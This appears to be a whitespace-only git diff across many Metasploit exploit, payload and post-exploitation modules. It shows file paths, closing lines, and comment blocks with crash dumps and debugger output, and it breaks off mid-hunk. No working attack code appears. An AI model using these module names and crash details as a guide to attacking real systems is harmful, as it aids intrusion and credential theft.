b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb index 7db40409d0..5df478be3e 100644 --- a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb +++ b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb @@ -186,4 +186,4 @@ EXCEL!Ordinal41+0x61a5: 300061b7 1200 adc al,byte ptr [eax] 300061b9 0400 add al,0 -=end \ No newline at end of file +=end diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb index 3fae20036e..2801f3096f 100644 --- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb +++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb @@ -72,4 +72,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/ftp/32bitftp_list_reply.rb b/modules/exploits/windows/ftp/32bitftp_list_reply.rb index 1c6b88487d..0d46b3d905 100644 --- a/modules/exploits/windows/ftp/32bitftp_list_reply.rb +++ b/modules/exploits/windows/ftp/32bitftp_list_reply.rb @@ -108,4 +108,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/ftp/aasync_list_reply.rb b/modules/exploits/windows/ftp/aasync_list_reply.rb index 4821a7f5d2..b9f84f8f57 100644 --- a/modules/exploits/windows/ftp/aasync_list_reply.rb +++ b/modules/exploits/windows/ftp/aasync_list_reply.rb @@ -90,4 +90,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb b/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb index 494ecf1247..e9881a127c 100644 --- a/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb +++ b/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb @@ -143,4 +143,3 @@ AbsoluteFTP 1.9.6 Does not work on: AbsoluteFTP 1.8 =end - diff --git a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb index d80cbd5ab6..f950851a41 100644 --- a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb @@ -92,4 +92,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/ftp/ftppad_list_reply.rb b/modules/exploits/windows/ftp/ftppad_list_reply.rb index 4b156785fe..2bba36acb4 100644 --- a/modules/exploits/windows/ftp/ftppad_list_reply.rb +++ b/modules/exploits/windows/ftp/ftppad_list_reply.rb @@ -95,4 +95,4 @@ class Metasploit3 < Msf::Exploit::Remote return end -end \ No newline at end of file +end diff --git a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb index 2a68a2b435..de1838ee32 100644 --- a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb +++ b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb @@ -111,4 +111,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/ftp/leapftp_list_reply.rb b/modules/exploits/windows/ftp/leapftp_list_reply.rb index 93a1b400dd..5a40cb2d77 100644 --- a/modules/exploits/windows/ftp/leapftp_list_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_list_reply.rb @@ -99,4 +99,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb index a698e2a353..76c4fdfd47 100644 --- a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb +++ b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb @@ -176,4 +176,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/ftp/odin_list_reply.rb b/modules/exploits/windows/ftp/odin_list_reply.rb index 1915cb71fa..1fd0b179eb 100644 --- a/modules/exploits/windows/ftp/odin_list_reply.rb +++ b/modules/exploits/windows/ftp/odin_list_reply.rb @@ -105,4 +105,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/http/altn_securitygateway.rb b/modules/exploits/windows/http/altn_securitygateway.rb index 8e8587bb1e..5b627060a5 100644 --- a/modules/exploits/windows/http/altn_securitygateway.rb +++ b/modules/exploits/windows/http/altn_securitygateway.rb @@ -134,4 +134,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/http/altn_webadmin.rb b/modules/exploits/windows/http/altn_webadmin.rb index 2bb5271df4..a04d82f62e 100644 --- a/modules/exploits/windows/http/altn_webadmin.rb +++ b/modules/exploits/windows/http/altn_webadmin.rb @@ -116,4 +116,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb index 24f963a951..231947d0e9 100644 --- a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb +++ b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb @@ -99,4 +99,3 @@ class Metasploit3 < Msf::Exploit::Remote handler end end - diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index c5fc5a7b8c..331b8e0cf7 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -84,4 +84,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb index ecec2eb457..b624e12ebb 100644 --- a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb +++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb @@ -274,4 +274,4 @@ meterpreter > run post/windows/manage/migrate [-] /projects/exploiting/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute' [-] (eval):80:in `create_temp_proc' [-] (eval):49:in `run' -=end \ No newline at end of file +=end diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb index 9ba2d38546..3c3b54d4db 100644 --- a/modules/exploits/windows/http/mcafee_epolicy_source.rb +++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb @@ -113,4 +113,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/http/netdecision_http_bof.rb b/modules/exploits/windows/http/netdecision_http_bof.rb index 7b3aa1c045..5e1ef82a95 100644 --- a/modules/exploits/windows/http/netdecision_http_bof.rb +++ b/modules/exploits/windows/http/netdecision_http_bof.rb @@ -89,4 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end \ No newline at end of file +end diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb index dbe29b71c4..8e6090b5a1 100644 --- a/modules/exploits/windows/http/psoproxy91_overflow.rb +++ b/modules/exploits/windows/http/psoproxy91_overflow.rb @@ -85,4 +85,3 @@ class Metasploit3 < Msf::Exploit::Remote handler end end - diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index 63ba23e015..3d5ebf82c9 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -89,4 +89,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb index 610e0ebbf0..c04418b1e8 100644 --- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb +++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb @@ -153,4 +153,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index 18884cc4c8..d576b18325 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -152,4 +152,3 @@ eTrust: A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2 BrightStor: A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2IDENT3IDENT4OSOLFFILE<0 0 0>SERVERVERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINECHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00> lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2IDENT3IDENT4OSOLFFILE<0 0 0>SERVERVERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINECHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00> =end - diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index e5afc09f31..8457395884 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -120,4 +120,3 @@ eTrust: A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2 BrightStor: A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2IDENT3IDENT4OSOLFFILE<0 0 0>SERVERVERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINECHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00> lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2IDENT3IDENT4OSOLFFILE<0 0 0>SERVERVERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINECHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00> =end - diff --git a/modules/exploits/windows/misc/bakbone_netvault_heap.rb b/modules/exploits/windows/misc/bakbone_netvault_heap.rb index 436415cdbc..f9b813bbce 100644 --- a/modules/exploits/windows/misc/bakbone_netvault_heap.rb +++ b/modules/exploits/windows/misc/bakbone_netvault_heap.rb @@ -162,4 +162,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/misc/bigant_server_usv.rb b/modules/exploits/windows/misc/bigant_server_usv.rb index cd67d20e97..e8cd82964d 100644 --- a/modules/exploits/windows/misc/bigant_server_usv.rb +++ b/modules/exploits/windows/misc/bigant_server_usv.rb @@ -86,4 +86,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/mssql/mssql_payload_sqli.rb b/modules/exploits/windows/mssql/mssql_payload_sqli.rb index 2246391f32..3d3f4cb6f1 100644 --- a/modules/exploits/windows/mssql/mssql_payload_sqli.rb +++ b/modules/exploits/windows/mssql/mssql_payload_sqli.rb @@ -131,4 +131,3 @@ class Metasploit3 < Msf::Exploit::Remote end - diff --git a/modules/exploits/windows/postgres/postgres_payload.rb b/modules/exploits/windows/postgres/postgres_payload.rb index 52b191e75e..746de7703e 100644 --- a/modules/exploits/windows/postgres/postgres_payload.rb +++ b/modules/exploits/windows/postgres/postgres_payload.rb @@ -140,4 +140,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/smb/ms04_011_lsass.rb b/modules/exploits/windows/smb/ms04_011_lsass.rb index d25204553b..b0c111b2c7 100644 --- a/modules/exploits/windows/smb/ms04_011_lsass.rb +++ b/modules/exploits/windows/smb/ms04_011_lsass.rb @@ -162,4 +162,3 @@ class Metasploit3 < Msf::Exploit::Remote handler end end - diff --git a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb index c7d84c2ba5..4d71b39f69 100644 --- a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb +++ b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb @@ -180,4 +180,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/smb/ms06_040_netapi.rb b/modules/exploits/windows/smb/ms06_040_netapi.rb index 621a1a9d9c..5388850f64 100644 --- a/modules/exploits/windows/smb/ms06_040_netapi.rb +++ b/modules/exploits/windows/smb/ms06_040_netapi.rb @@ -329,4 +329,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index d72b12fcdf..0fca26511b 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -1196,4 +1196,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/smb/ms10_061_spoolss.rb b/modules/exploits/windows/smb/ms10_061_spoolss.rb index f3dded1869..5d5752359f 100644 --- a/modules/exploits/windows/smb/ms10_061_spoolss.rb +++ b/modules/exploits/windows/smb/ms10_061_spoolss.rb @@ -443,4 +443,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index 0b36df5e00..2102af8ded 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -367,4 +367,3 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end end - diff --git a/modules/exploits/windows/smtp/njstar_smtp_bof.rb b/modules/exploits/windows/smtp/njstar_smtp_bof.rb index 5471619390..66bf293b78 100644 --- a/modules/exploits/windows/smtp/njstar_smtp_bof.rb +++ b/modules/exploits/windows/smtp/njstar_smtp_bof.rb @@ -202,4 +202,3 @@ Invalid exception stack at 41414141 00ccffe0 d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00 ...|0..|........ =end - diff --git a/modules/exploits/windows/wins/ms04_045_wins.rb b/modules/exploits/windows/wins/ms04_045_wins.rb index 9f44ed5b48..29a69e3ecc 100644 --- a/modules/exploits/windows/wins/ms04_045_wins.rb +++ b/modules/exploits/windows/wins/ms04_045_wins.rb @@ -210,4 +210,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/modules.rb.ts.rb b/modules/modules.rb.ts.rb index 7d6367121f..027c4cd466 100644 --- a/modules/modules.rb.ts.rb +++ b/modules/modules.rb.ts.rb @@ -23,4 +23,4 @@ class Rex::TestSuite return suite; end -end \ No newline at end of file +end diff --git a/modules/nops/nop_test.rb.ut.rb b/modules/nops/nop_test.rb.ut.rb index 7923dbbd23..272f475742 100644 --- a/modules/nops/nop_test.rb.ut.rb +++ b/modules/nops/nop_test.rb.ut.rb @@ -48,4 +48,4 @@ $framework.nops.each_module { |name, mod| $stderr.puts("#{name.ljust(25)}: Passed: #{passed}, Failed: #{failed}, Unique: #{h.keys.length}") -} \ No newline at end of file +} diff --git a/modules/nops/ppc/simple.rb b/modules/nops/ppc/simple.rb index d6921374a5..246a7ad2e4 100644 --- a/modules/nops/ppc/simple.rb +++ b/modules/nops/ppc/simple.rb @@ -69,4 +69,4 @@ class Metasploit3 < Msf::Nop return ("\x60" * length)[0, length] end -end \ No newline at end of file +end diff --git a/modules/nops/x86/opty2.rb b/modules/nops/x86/opty2.rb index f78454be79..c095ff099f 100644 --- a/modules/nops/x86/opty2.rb +++ b/modules/nops/x86/opty2.rb @@ -43,4 +43,4 @@ class Metasploit3 < Msf::Nop opty.generate_sled(length) end -end \ No newline at end of file +end diff --git a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb index 7e6e7d9030..4056ddfd60 100644 --- a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb @@ -122,4 +122,3 @@ module Metasploit3 end end - diff --git a/modules/payloads/singles/aix/ppc/shell_find_port.rb b/modules/payloads/singles/aix/ppc/shell_find_port.rb index 77eb52cfc5..ee1e622391 100644 --- a/modules/payloads/singles/aix/ppc/shell_find_port.rb +++ b/modules/payloads/singles/aix/ppc/shell_find_port.rb @@ -111,4 +111,3 @@ module Metasploit3 end end - diff --git a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb index 7aa76c85d9..b502e7354c 100644 --- a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb @@ -108,4 +108,3 @@ module Metasploit3 end end - diff --git a/modules/payloads/singles/cmd/windows/download_eval_vbs.rb b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb index af481cb704..27d525a5b5 100644 --- a/modules/payloads/singles/cmd/windows/download_eval_vbs.rb +++ b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb @@ -70,4 +70,3 @@ module Metasploit3 command << "#{vbsname}.vbs" end end - diff --git a/modules/payloads/singles/generic/debug_trap.rb b/modules/payloads/singles/generic/debug_trap.rb index 2bd8a3f762..2deb0398a9 100644 --- a/modules/payloads/singles/generic/debug_trap.rb +++ b/modules/payloads/singles/generic/debug_trap.rb @@ -35,4 +35,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/singles/linux/x86/adduser.rb b/modules/payloads/singles/linux/x86/adduser.rb index 5a67007492..5e7f59f279 100644 --- a/modules/payloads/singles/linux/x86/adduser.rb +++ b/modules/payloads/singles/linux/x86/adduser.rb @@ -63,4 +63,4 @@ module Metasploit3 "\xcd\x80" end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb index 0c8d127cc0..8b2f096a09 100644 --- a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb @@ -52,4 +52,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/java/bind_tcp.rb b/modules/payloads/stagers/java/bind_tcp.rb index 07e3999ead..9b207f1ff9 100644 --- a/modules/payloads/stagers/java/bind_tcp.rb +++ b/modules/payloads/stagers/java/bind_tcp.rb @@ -55,4 +55,3 @@ module Metasploit3 end end - diff --git a/modules/payloads/stagers/java/reverse_http.rb b/modules/payloads/stagers/java/reverse_http.rb index ffb2d8f81f..b5cd04548e 100644 --- a/modules/payloads/stagers/java/reverse_http.rb +++ b/modules/payloads/stagers/java/reverse_http.rb @@ -62,4 +62,3 @@ module Metasploit3 20 end end - diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb index 4334b8c6d2..896cccf489 100644 --- a/modules/payloads/stagers/java/reverse_https.rb +++ b/modules/payloads/stagers/java/reverse_https.rb @@ -64,4 +64,3 @@ module Metasploit3 20 end end - diff --git a/modules/payloads/stagers/java/reverse_tcp.rb b/modules/payloads/stagers/java/reverse_tcp.rb index 5f4c9f424a..981cee76b8 100644 --- a/modules/payloads/stagers/java/reverse_tcp.rb +++ b/modules/payloads/stagers/java/reverse_tcp.rb @@ -56,4 +56,3 @@ module Metasploit3 end end - diff --git a/modules/payloads/stagers/linux/x86/bind_tcp.rb b/modules/payloads/stagers/linux/x86/bind_tcp.rb index 24a3681792..11cf43121c 100644 --- a/modules/payloads/stagers/linux/x86/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_tcp.rb @@ -52,4 +52,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/linux/x86/find_tag.rb b/modules/payloads/stagers/linux/x86/find_tag.rb index 5ef0fb0041..aa33fdaed1 100644 --- a/modules/payloads/stagers/linux/x86/find_tag.rb +++ b/modules/payloads/stagers/linux/x86/find_tag.rb @@ -51,4 +51,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_tcp.rb index 8691c38a95..6c6f96c307 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb @@ -53,4 +53,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/windows/findtag_ord.rb b/modules/payloads/stagers/windows/findtag_ord.rb index 4e6e923aca..0ce7bcbd50 100644 --- a/modules/payloads/stagers/windows/findtag_ord.rb +++ b/modules/payloads/stagers/windows/findtag_ord.rb @@ -49,4 +49,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb index 6b669ff713..d10533a74f 100644 --- a/modules/payloads/stagers/windows/reverse_http.rb +++ b/modules/payloads/stagers/windows/reverse_http.rb @@ -89,4 +89,3 @@ module Metasploit3 20 end end - diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index ec84371aaa..e592a24e24 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -91,4 +91,3 @@ module Metasploit3 20 end end - diff --git a/modules/payloads/stagers/windows/reverse_ipv6_http.rb b/modules/payloads/stagers/windows/reverse_ipv6_http.rb index cc15f9f259..f9846d7ef0 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_http.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_http.rb @@ -96,4 +96,3 @@ module Metasploit3 end end - diff --git a/modules/payloads/stagers/windows/reverse_ipv6_https.rb b/modules/payloads/stagers/windows/reverse_ipv6_https.rb index 95b2d2af2e..fda75c56cb 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_https.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_https.rb @@ -97,4 +97,3 @@ module Metasploit3 20 end end - diff --git a/modules/payloads/stagers/windows/reverse_tcp_dns.rb b/modules/payloads/stagers/windows/reverse_tcp_dns.rb index a5873c2ab1..5221e6855e 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_dns.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_dns.rb @@ -88,4 +88,3 @@ module Metasploit3 end end - diff --git a/modules/payloads/stages/java/meterpreter.rb b/modules/payloads/stages/java/meterpreter.rb index a1aba85b79..323a967051 100644 --- a/modules/payloads/stages/java/meterpreter.rb +++ b/modules/payloads/stages/java/meterpreter.rb @@ -70,4 +70,3 @@ module Metasploit3 end end - diff --git a/modules/payloads/stages/java/shell.rb b/modules/payloads/stages/java/shell.rb index aee91b214e..6e819e6b3b 100644 --- a/modules/payloads/stages/java/shell.rb +++ b/modules/payloads/stages/java/shell.rb @@ -52,5 +52,3 @@ module Metasploit3 end end - - diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb index 9d95466e20..0cc22ba0fc 100644 --- a/modules/payloads/stages/linux/x86/meterpreter.rb +++ b/modules/payloads/stages/linux/x86/meterpreter.rb @@ -130,4 +130,3 @@ module Metasploit3 return met end end - diff --git a/modules/payloads/stages/osx/x86/isight.rb b/modules/payloads/stages/osx/x86/isight.rb index de72b7e43a..a645f5b06b 100644 --- a/modules/payloads/stages/osx/x86/isight.rb +++ b/modules/payloads/stages/osx/x86/isight.rb @@ -96,4 +96,3 @@ module Metasploit3 end end - diff --git a/modules/payloads/stages/php/meterpreter.rb b/modules/payloads/stages/php/meterpreter.rb index 7c0d1e00c1..fc618945a8 100644 --- a/modules/payloads/stages/php/meterpreter.rb +++ b/modules/payloads/stages/php/meterpreter.rb @@ -41,4 +41,3 @@ module Metasploit3 met end end - diff --git a/modules/payloads/stages/windows/meterpreter.rb b/modules/payloads/stages/windows/meterpreter.rb index 5faeb67d1c..5d7d4a332c 100644 --- a/modules/payloads/stages/windows/meterpreter.rb +++ b/modules/payloads/stages/windows/meterpreter.rb @@ -48,4 +48,3 @@ module Metasploit3 end end - diff --git a/modules/payloads/stages/windows/shell.rb b/modules/payloads/stages/windows/shell.rb index 0f21b6a538..03699d1a7f 100644 --- a/modules/payloads/stages/windows/shell.rb +++ b/modules/payloads/stages/windows/shell.rb @@ -63,4 +63,3 @@ module Metasploit3 true end end - diff --git a/modules/payloads/stages/windows/upexec.rb b/modules/payloads/stages/windows/upexec.rb index 16937f8eb5..71070e24db 100644 --- a/modules/payloads/stages/windows/upexec.rb +++ b/modules/payloads/stages/windows/upexec.rb @@ -103,4 +103,3 @@ module Metasploit3 end end - diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb index f6388cf0ea..98e0658c20 100644 --- a/modules/payloads/stages/windows/vncinject.rb +++ b/modules/payloads/stages/windows/vncinject.rb @@ -40,4 +40,3 @@ module Metasploit3 File.join(Msf::Config.install_root, "data", "vncdll.dll") end end - diff --git a/modules/payloads/stages/windows/x64/vncinject.rb b/modules/payloads/stages/windows/x64/vncinject.rb index 5b9fa4dc87..699087fdaa 100644 --- a/modules/payloads/stages/windows/x64/vncinject.rb +++ b/modules/payloads/stages/windows/x64/vncinject.rb @@ -39,4 +39,3 @@ module Metasploit3 end end - diff --git a/modules/post/linux/gather/enum_configs.rb b/modules/post/linux/gather/enum_configs.rb index f82b0a35e7..20ce53a2b1 100644 --- a/modules/post/linux/gather/enum_configs.rb +++ b/modules/post/linux/gather/enum_configs.rb @@ -84,4 +84,4 @@ class Metasploit3 < Msf::Post save(f, output) if output !~ /No such file or directory/ end end -end \ No newline at end of file +end diff --git a/modules/post/linux/gather/enum_network.rb b/modules/post/linux/gather/enum_network.rb index bebb862b7e..8af96aec96 100644 --- a/modules/post/linux/gather/enum_network.rb +++ b/modules/post/linux/gather/enum_network.rb @@ -143,4 +143,4 @@ class Metasploit3 < Msf::Post return keys end -end \ No newline at end of file +end diff --git a/modules/post/linux/gather/enum_protections.rb b/modules/post/linux/gather/enum_protections.rb index 1fece2187b..9b5d6d3b15 100644 --- a/modules/post/linux/gather/enum_protections.rb +++ b/modules/post/linux/gather/enum_protections.rb @@ -98,4 +98,4 @@ class Metasploit3 < Msf::Post print_status("Installed applications saved to notes.") end -end \ No newline at end of file +end diff --git a/modules/post/multi/gather/env.rb b/modules/post/multi/gather/env.rb index 35c1025317..4908c948b4 100644 --- a/modules/post/multi/gather/env.rb +++ b/modules/post/multi/gather/env.rb @@ -78,4 +78,3 @@ class Metasploit3 < Msf::Post end end - diff --git a/modules/post/multi/general/close.rb b/modules/post/multi/general/close.rb index 38ac6e519a..ba132e5b05 100644 --- a/modules/post/multi/general/close.rb +++ b/modules/post/multi/general/close.rb @@ -32,4 +32,3 @@ class Metasploit3 < Msf::Post end end - diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 592dd8e060..a375c4cf8a 100644 --- a/modules/post/multi/manage/system_session.rb +++ b/modules/post/multi/manage/system_session.rb @@ -201,4 +201,4 @@ class Metasploit3 < Msf::Post end return cmd end -end \ No newline at end of file +end diff --git a/modules/post/osx/gather/enum_adium.rb b/modules/post/osx/gather/enum_adium.rb index d8f1b4f2aa..60536238f9 100644 --- a/modules/post/osx/gather/enum_adium.rb +++ b/modules/post/osx/gather/enum_adium.rb @@ -295,4 +295,4 @@ end =begin Adium: /Users/[username]/Library/Application\ Support/Adium\ 2.0/ -=end \ No newline at end of file +=end diff --git a/modules/post/solaris/gather/checkvm.rb b/modules/post/solaris/gather/checkvm.rb index 31dd66560d..b4c03e1eaa 100644 --- a/modules/post/solaris/gather/checkvm.rb +++ b/modules/post/solaris/gather/checkvm.rb @@ -73,4 +73,4 @@ class Metasploit3 < Msf::Post -end \ No newline at end of file +end diff --git a/modules/post/windows/escalate/bypassuac.rb b/modules/post/windows/escalate/bypassuac.rb index 6ae69482e7..f51ad07728 100644 --- a/modules/post/windows/escalate/bypassuac.rb +++ b/modules/post/windows/escalate/bypassuac.rb @@ -148,4 +148,3 @@ class Metasploit3 < Msf::Post end - diff --git a/modules/post/windows/gather/credentials/idm.rb b/modules/post/windows/gather/credentials/idm.rb index cc0347e8ac..901f5aa26f 100644 --- a/modules/post/windows/gather/credentials/idm.rb +++ b/modules/post/windows/gather/credentials/idm.rb @@ -101,4 +101,3 @@ class Metasploit3 < Msf::Post end end - diff --git a/modules/post/windows/gather/credentials/imvu.rb b/modules/post/windows/gather/credentials/imvu.rb index 4b23b75a65..ff1a14964c 100644 --- a/modules/post/windows/gather/credentials/imvu.rb +++ b/modules/post/windows/gather/credentials/imvu.rb @@ -92,4 +92,3 @@ class Metasploit3 < Msf::Post end end - diff --git a/modules/post/windows/gather/enum_artifacts.rb b/modules/post/windows/gather/enum_artifacts.rb index 91058ad26f..8c4edb8af3 100644 --- a/modules/post/windows/gather/enum_artifacts.rb +++ b/modules/post/windows/gather/enum_artifacts.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Post next if digest == nil if digest == file['csum'] then found << file['name'] end end - + # Process registry entries vprint_status("Processing #{regs.length.to_s} registry entries for #{key}.") diff --git a/modules/post/windows/gather/enum_domains.rb b/modules/post/windows/gather/enum_domains.rb index 18305810c8..ceb18b1865 100644 --- a/modules/post/windows/gather/enum_domains.rb +++ b/modules/post/windows/gather/enum_domains.rb @@ -91,4 +91,3 @@ class Metasploit3 < Msf::Post end end end - diff --git a/modules/post/windows/gather/hashdump.rb b/modules/post/windows/gather/hashdump.rb index f86ca40d3f..9684def006 100644 --- 